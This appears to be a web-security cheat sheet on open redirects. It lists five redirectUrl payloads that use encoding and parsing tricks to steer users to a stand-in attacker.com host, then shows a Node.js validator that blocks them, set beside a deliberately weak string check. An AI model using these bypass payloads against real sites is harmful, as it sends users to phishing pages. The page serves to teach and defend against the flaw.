Open Redirect
Last modified: 2022-12-01
An open redirect occurs when an application accepts user-controlled input that specifies a link to an external site and uses that link in a redirect.
Cheat Sheet
https://vulnerable.com/example.php?redirectUrl=https://attacker.com/
https://vulnerable.com/example.php?redirectUrl=https:\\attacker.com\
https://vulnerable.com/example.php?redirectUrl=https://attacker.com#.vulnerable.com/
<!-- "%E3%80%82" is "。" (U+3002, ideographic full stop), which browsers treat as "." -->
https://vulnerable.com/example.php?redirectUrl=https://attacker.com%E3%80%82%23.vulnerable.com/
<!-- "%0d" is a carriage return (CR) -->
https://vulnerable.com/example.php?redirectUrl=/%0d/attacker.com/
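A server-side check that refuses every redirectUrl value in the cheat sheet above, shown next to a weak string check that several of them pass. This is an added example, not code from the original page; ALLOWED_ORIGINS, BASE and both function names are assumptions, and the runtime is assumed to be Node.js with its built-in WHATWG URL parser.

```javascript
// Added example: validating a redirectUrl value before redirecting.
// ALLOWED_ORIGINS, BASE and both function names are assumptions.
const ALLOWED_ORIGINS = new Set(['https://vulnerable.com']);
const BASE = 'https://vulnerable.com/example.php';

// Constructed weak check: string tests on the raw value.
function naiveCheck(raw) {
  return raw.startsWith('/') || raw.endsWith('.vulnerable.com/');
}

// Parse the value the way a browser will (WHATWG URL), then compare the
// resulting origin exactly. Returns an absolute URL, or null to refuse.
function safeRedirectTarget(raw) {
  if (typeof raw !== 'string' || raw.length === 0) return null;
  let u;
  try {
    u = new URL(raw, BASE); // resolves relative paths; strips tab/CR/LF
  } catch (e) {
    return null;
  }
  if (u.protocol !== 'https:') return null;
  if (u.username !== '' || u.password !== '') return null;
  if (!ALLOWED_ORIGINS.has(u.origin)) return null;
  // Return the absolute form: a bare path such as "//host/" would be
  // read as protocol-relative if placed in a Location header.
  return u.href;
}

// redirectUrl values from the cheat sheet, percent-decoded where encoded.
const CHEAT_SHEET = [
  'https://attacker.com/',
  'https:\\\\attacker.com\\',
  'https://attacker.com#.vulnerable.com/',
  'https://attacker.com\u3002#.vulnerable.com/',
  '/\r/attacker.com/',
];

for (const raw of [...CHEAT_SHEET, '/account?tab=1']) {
  console.log(JSON.stringify(raw), '| naive:', naiveCheck(raw),
    '| safe:', safeRedirectTarget(raw));
}
```

When safeRedirectTarget returns null, redirect to a fixed default page rather than echoing the supplied value.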